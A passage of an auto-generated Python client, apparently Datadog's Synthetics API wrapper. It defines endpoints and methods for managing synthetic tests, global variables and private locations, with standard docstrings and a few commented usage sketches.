"location_id": (str,),
"body": (SyntheticsPrivateLocation,),
},
"attribute_map": {
"location_id": "location_id",
},
"location_map": {
"location_id": "path",
"body": "body",
},
"collection_format_map": {},
},
headers_map={"accept": ["application/json"], "content_type": ["application/json"]},
api_client=api_client,
)
self._update_test_pause_status_endpoint = _Endpoint(
settings={
"response_type": (bool,),
"auth": ["apiKeyAuth", "appKeyAuth"],
"endpoint_path": "/api/v1/synthetics/tests/{public_id}/status",
"operation_id": "update_test_pause_status",
"http_method": "PUT",
"servers": None,
},
params_map={
"all": [
"public_id",
"body",
],
"required": [
"public_id",
"body",
],
"nullable": [],
"enum": [],
"validation": [],
},
root_map={
"validations": {},
"allowed_values": {},
"openapi_types": {
"public_id": (str,),
"body": (SyntheticsUpdateTestPauseStatusPayload,),
},
"attribute_map": {
"public_id": "public_id",
},
"location_map": {
"public_id": "path",
"body": "body",
},
"collection_format_map": {},
},
headers_map={"accept": ["application/json"], "content_type": ["application/json"]},
api_client=api_client,
)
def create_global_variable(self, body, **kwargs):
"""Create a global variable # noqa: E501
Create a Synthetics global variable. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_global_variable(body, async_req=True)
>>> result = thread.get()
Args:
body (SyntheticsGlobalVariable): Details of the global variable to create.
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done on the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done on the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
SyntheticsGlobalVariable
If the method is called asynchronously, returns the request
thread.
"""
kwargs = self._create_global_variable_endpoint.default_arguments(kwargs)
kwargs["body"] = body
return self._create_global_variable_endpoint.call_with_http_info(**kwargs)
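# A commented-out usage sketch for the call above. It assumes the standard
# client entry points (Configuration, ApiClient) exported by
# datadog_api_client.v1 and credentials coming from the environment; adjust
# to your own setup:
#
#     from datadog_api_client.v1 import ApiClient, Configuration
#     from datadog_api_client.v1.api.synthetics_api import SyntheticsApi
#     from datadog_api_client.v1.model.synthetics_global_variable import SyntheticsGlobalVariable
#
#     configuration = Configuration()
#     with ApiClient(configuration) as api_client:
#         api_instance = SyntheticsApi(api_client)
#         body = SyntheticsGlobalVariable(...)  # fill in the variable details
#         result = api_instance.create_global_variable(body)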
def create_private_location(self, body, **kwargs):
"""Create a private location # noqa: E501
Create a new Synthetics private location. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_private_location(body, async_req=True)
>>> result = thread.get()
Args:
body (SyntheticsPrivateLocation): Details of the private location to create.
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done on the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done on the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
SyntheticsPrivateLocationCreationResponse
If the method is called asynchronously, returns the request
thread.
"""
kwargs = self._create_private_location_endpoint.default_arguments(kwargs)
kwargs["body"] = body
return self._create_private_location_endpoint.call_with_http_info(**kwargs)
def create_synthetics_api_test(self, body, **kwargs):
"""Create an API test # noqa: E501
Create a Synthetic API test. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_synthetics_api_test(body, async_req=True)
>>> result = thread.get()
Args:
body (SyntheticsAPITest): Details of the test to create.
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done on the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done on the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
SyntheticsAPITest
If the method is called asynchronously, returns the request
thread.
"""
kwargs = self._create_synthetics_api_test_endpoint.default_arguments(kwargs)
kwargs["body"] = body
return self._create_synthetics_api_test_endpoint.call_with_http_info(**kwargs)
def create_synthetics_browser_test(self, body, **kwargs):
"""Create a browser test # noqa: E501
Create a Synthetic browser test. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_synthetics_browser_test(body, async_req=True)
>>> result = thread.get()
Args:
body (SyntheticsBrowserTest): Details of the test to create.
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done on the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done on the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
SyntheticsBrowserTest
If the method is called asynchronously, returns the request
thread.
"""
kwargs = self._create_synthetics_browser_test_endpoint.default_arguments(kwargs)
kwargs["body"] = body
return self._create_synthetics_browser_test_endpoint.call_with_http_info(**kwargs)
def delete_global_variable(self, variable_id, **kwargs):
"""Delete a global variable # noqa: E501
Delete a Synthetics global variable. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_global_variable(variable_id, async_req=True)
>>> result = thread.get()
Args:
variable_id (str): The ID of the global variable.
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done on the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done on the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
None
If the method is called asynchronously, returns the request
thread.
"""
kwargs = self._delete_global_variable_endpoint.default_arguments(kwargs)
kwargs["variable_id"] = variable_id
return self._delete_global_variable_endpoint.call_with_http_info(**kwargs)
def delete_private_location(self, location_id, **kwargs):
"""Delete a private location # noqa: E501
Delete a Synthetics private location. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_private_location(location_id, async_req=True)
>>> result = thread.get()
Args:
location_id (str): The ID of the private location.
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done on the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done on the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
None
If the method is called asynchronously, returns the request
thread.
"""
kwargs = self._delete_private_location_endpoint.default_arguments(kwargs)
kwargs["location_id"] = location_id
return self._delete_private_location_endpoint.call_with_http_info(**kwargs)
def delete_tests(self, body, **kwargs):
"""Delete tests # noqa: E501
Delete multiple Synthetic tests by ID. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_tests(body, async_req=True)
>>> result = thread.get()
Args:
body (SyntheticsDeleteTestsPayload): Public ID list of the Synthetic tests to be deleted.
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done on the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done on the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
SyntheticsDeleteTestsResponse
If the method is called asynchronously, returns the request
thread.
"""
kwargs = self._delete_tests_endpoint.default_arguments(kwargs)
kwargs["body"] = body
return self._delete_tests_endpoint.call_with_http_info(**kwargs)
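# delete_tests() expects a payload listing the public IDs to remove. A hedged,
# commented-out sketch, assuming the payload model exposes a public_ids
# attribute as the API documentation suggests (IDs are illustrative only):
#
#     body = SyntheticsDeleteTestsPayload(public_ids=["abc-def-ghi"])
#     api_instance.delete_tests(body)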
def edit_global_variable(self, variable_id, body, **kwargs):
"""Edit a global variable # noqa: E501
Edit a Synthetics global variable. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.edit_global_variable(variable_id, body, async_req=True)
>>> result = thread.get()
Args:
variable_id (str): The ID of the global variable.
body (SyntheticsGlobalVariable): Details of the global variable to update.
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done on the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done on the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
SyntheticsGlobalVariable
If the method is called asynchronously, returns the request
thread.
"""
kwargs = self._edit_global_variable_endpoint.default_arguments(kwargs)
kwargs["variable_id"] = variable_id
kwargs["body"] = body
return self._edit_global_variable_endpoint.call_with_http_info(**kwargs)
def get_api_test(self, public_id, **kwargs):
"""Get an API test # noqa: E501
Get the detailed configuration associated with a Synthetic API test. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_api_test(public_id, async_req=True)
>>> result = thread.get()
Args:
public_id (str): The public ID of the test to get details from.
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done on the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done on the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
SyntheticsAPITest
If the method is called asynchronously, returns the request
thread.
"""
kwargs = self._get_api_test_endpoint.default_arguments(kwargs)
kwargs["public_id"] = public_id
return self._get_api_test_endpoint.call_with_http_info(**kwargs)
def get_api_test_latest_results(self, public_id, **kwargs):
"""Get an API test's latest results summaries # noqa: E501
Get the last 50 test results summaries for a given Synthetics API test. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_api_test_latest_results(public_id, async_req=True)
>>> result = thread.get()
Args:
public_id (str): The public ID of the test for which to search results.
Keyword Args:
from_ts (int): Timestamp from which to start querying results. [optional]
to_ts (int): Timestamp up to which to query results. [optional]
probe_dc ([str]): Locations for which to query results. [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done on the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done on the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
SyntheticsGetAPITestLatestResultsResponse
If the method is called asynchronously, returns the request
thread.
"""
kwargs = self._get_api_test_latest_results_endpoint.default_arguments(kwargs)
kwargs["public_id"] = public_id
return self._get_api_test_latest_results_endpoint.call_with_http_info(**kwargs)
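# The optional keyword arguments documented above map directly to query
# parameters. A hedged, commented-out sketch of a filtered call (all values
# are illustrative only):
#
#     results = api_instance.get_api_test_latest_results(
#         "abc-def-ghi",
#         from_ts=1632858000000,
#         to_ts=1632944400000,
#         probe_dc=["aws:eu-west-1"],
#     )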
def get_api_test_result(self, public_id, result_id, **kwargs):
"""Get an API test result # noqa: E501
Get a specific full result from a given (API) Synthetic test. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_api_test_result(public_id, result_id, async_req=True)
>>> result = thread.get()
Args:
public_id (str): The public ID of the API test to which the target result belongs.
result_id (str): The ID of the result to get.
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done on the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done on the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
SyntheticsAPITestResultFull
If the method is called asynchronously, returns the request
thread.
"""
kwargs = self._get_api_test_result_endpoint.default_arguments(kwargs)
kwargs["public_id"] = public_id
kwargs["result_id"] = result_id
return self._get_api_test_result_endpoint.call_with_http_info(**kwargs)
def get_browser_test(self, public_id, **kwargs):
"""Get a browser test # noqa: E501
Get the detailed configuration (including steps) associated with a Synthetic browser test. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_browser_test(public_id, async_req=True)
>>> result = thread.get()
Args:
public_id (str): The public ID of the test to get details from.
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done on the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done on the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
SyntheticsBrowserTest
If the method is called asynchronously, returns the request
thread.
"""
kwargs = self._get_browser_test_endpoint.default_arguments(kwargs)
kwargs["public_id"] = public_id
return self._get_browser_test_endpoint.call_with_http_info(**kwargs)
def get_browser_test_latest_results(self, public_id, **kwargs):
"""Get a browser test's latest results summaries # noqa: E501
Get the last 50 test results summaries for a given Synthetics Browser test. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_browser_test_latest_results(public_id, async_req=True)
>>> result = thread.get()
Args:
public_id (str): The public ID of the browser test for which to search results.
Keyword Args:
from_ts (int): Timestamp from which to start querying results. [optional]
to_ts (int): Timestamp up to which to query results. [optional]
probe_dc ([str]): Locations for which to query results. [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done on the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done on the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
SyntheticsGetBrowserTestLatestResultsResponse
If the method is called asynchronously, returns the request
thread.
"""
kwargs = self._get_browser_test_latest_results_endpoint.default_arguments(kwargs)
kwargs["public_id"] = public_id
return self._get_browser_test_latest_results_endpoint.call_with_http_info(**kwargs)
def get_browser_test_result(self, public_id, result_id, **kwargs):
"""Get a browser test result # noqa: E501
Get a specific full result from a given (browser) Synthetic test. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_browser_test_result(public_id, result_id, async_req=True)
>>> result = thread.get()
Args:
public_id (str): The public ID of the browser test to which the target result belongs.
result_id (str): The ID of the result to get.
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done on the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done on the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
SyntheticsBrowserTestResultFull
If the method is called asynchronously, returns the request
thread.
"""
kwargs = self._get_browser_test_result_endpoint.default_arguments(kwargs)
kwargs["public_id"] = public_id
kwargs["result_id"] = result_id
return self._get_browser_test_result_endpoint.call_with_http_info(**kwargs)
def get_global_variable(self, variable_id, **kwargs):
"""Get a global variable # noqa: E501
Get the detailed configuration of a global variable. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_global_variable(variable_id, async_req=True)
>>> result = thread.get()
Args:
variable_id (str): The ID of the global variable.
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done on the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done on the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
SyntheticsGlobalVariable
If the method is called asynchronously, returns the request
thread.
"""
kwargs = self._get_global_variable_endpoint.default_arguments(kwargs)
kwargs["variable_id"] = variable_id
return self._get_global_variable_endpoint.call_with_http_info(**kwargs)
def get_private_location(self, location_id, **kwargs):
"""Get a private location # noqa: E501
Get a Synthetics private location. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_private_location(location_id, async_req=True)
>>> result = thread.get()
Args:
location_id (str): The ID of the private location.
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number is provided, it will be the total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done on the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done on the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
SyntheticsPrivateLocation
If the method is called asynchronously, returns the request
thread.
"""
kwargs = self._get_private_location_endpoint.default_arguments(kwargs)
kwargs["location_id"] = location_id
return self._get_private_location_endpoint.call_with_http_info(**kwargs)
def get_test(self, public_id, **kwargs):
"""Get a test configuration # noqa: E501
Get the detailed configuration associated with a Synthetics test. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_test(public_id, async_req=True)
>>> result = thread.get()
Args:
public_id (str): The public ID of the test to get details from.
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number is provided, it will be the total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done on the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done on the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
SyntheticsTestDetails
If the method is called asynchronously, returns the request
thread.
"""
kwargs = self._get_test_endpoint.default_arguments(kwargs)
kwargs["public_id"] = public_id
return self._get_test_endpoint.call_with_http_info(**kwargs)
def list_global_variables(self, **kwargs):
"""Get all global variables # noqa: E501
Get the list of all Synthetics global variables. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_global_variables(async_req=True)
>>> result = thread.get()
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number is provided, it will be the total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done on the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done on the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
SyntheticsListGlobalVariablesResponse
If the method is called asynchronously, returns the request
thread.
"""
kwargs = self._list_global_variables_endpoint.default_arguments(kwargs)
return self._list_global_variables_endpoint.call_with_http_info(**kwargs)
def list_locations(self, **kwargs):
"""Get all locations (public and private) # noqa: E501
Get the list of public and private locations available for Synthetic tests. No arguments required. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_locations(async_req=True)
>>> result = thread.get()
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number is provided, it will be the total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done on the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done on the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
SyntheticsLocations
If the method is called asynchronously, returns the request
thread.
"""
kwargs = self._list_locations_endpoint.default_arguments(kwargs)
return self._list_locations_endpoint.call_with_http_info(**kwargs)
def list_tests(self, **kwargs):
"""Get the list of all tests # noqa: E501
Get the list of all Synthetic tests. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_tests(async_req=True)
>>> result = thread.get()
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number is provided, it will be the total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done on the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done on the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
SyntheticsListTestsResponse
If the method is called asynchronously, returns the request
thread.
"""
kwargs = self._list_tests_endpoint.default_arguments(kwargs)
return self._list_tests_endpoint.call_with_http_info(**kwargs)
def trigger_ci_tests(self, body, **kwargs):
"""Trigger tests from CI/CD pipelines # noqa: E501
Trigger a set of Synthetics tests for continuous integration. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.trigger_ci_tests(body, async_req=True)
>>> result = thread.get()
Args:
body (SyntheticsCITestBody): Details of the test to trigger.
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number is provided, it will be the total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done on the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done on the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
SyntheticsTriggerCITestsResponse
If the method is called asynchronously, returns the request
thread.
"""
kwargs = self._trigger_ci_tests_endpoint.default_arguments(kwargs)
kwargs["body"] = body
return self._trigger_ci_tests_endpoint.call_with_http_info(**kwargs)
def update_api_test(self, public_id, body, **kwargs):
"""Edit an API test # noqa: E501
Edit the configuration of a Synthetic API test. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_api_test(public_id, body, async_req=True)
>>> result = thread.get()
Args:
public_id (str): The public ID of the test to edit.
body (SyntheticsAPITest): New test details to be saved.
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number is provided, it will be the total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done on the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done on the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
SyntheticsAPITest
If the method is called asynchronously, returns the request
thread.
"""
kwargs = self._update_api_test_endpoint.default_arguments(kwargs)
kwargs["public_id"] = public_id
kwargs["body"] = body
return self._update_api_test_endpoint.call_with_http_info(**kwargs)
def update_browser_test(self, public_id, body, **kwargs):
"""Edit a browser test # noqa: E501
Edit the configuration of a Synthetic browser test. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_browser_test(public_id, body, async_req=True)
>>> result = thread.get()
Args:
public_id (str): The public ID of the test to edit.
body (SyntheticsBrowserTest): New test details to be saved.
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number is provided, it will be the total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done on the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done on the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
SyntheticsBrowserTest
If the method is called asynchronously, returns the request
thread.
"""
kwargs = self._update_browser_test_endpoint.default_arguments(kwargs)
kwargs["public_id"] = public_id
kwargs["body"] = body
return self._update_browser_test_endpoint.call_with_http_info(**kwargs)
def update_private_location(self, location_id, body, **kwargs):
"""Edit a private location # noqa: E501
Edit a Synthetics private location. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_private_location(location_id, body, async_req=True)
>>> result = thread.get()
Args:
location_id (str): The ID of the private location.
body (SyntheticsPrivateLocation): Details of the private location to be updated.
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number is provided, it will be the total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done on the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done on the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
SyntheticsPrivateLocation
If the method is called asynchronously, returns the request
thread.
"""
kwargs = self._update_private_location_endpoint.default_arguments(kwargs)
kwargs["location_id"] = location_id
kwargs["body"] = body
return self._update_private_location_endpoint.call_with_http_info(**kwargs)
def update_test_pause_status(self, public_id, body, **kwargs):
"""Pause or start a test # noqa: E501
Pause or start a Synthetics test by changing the status. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
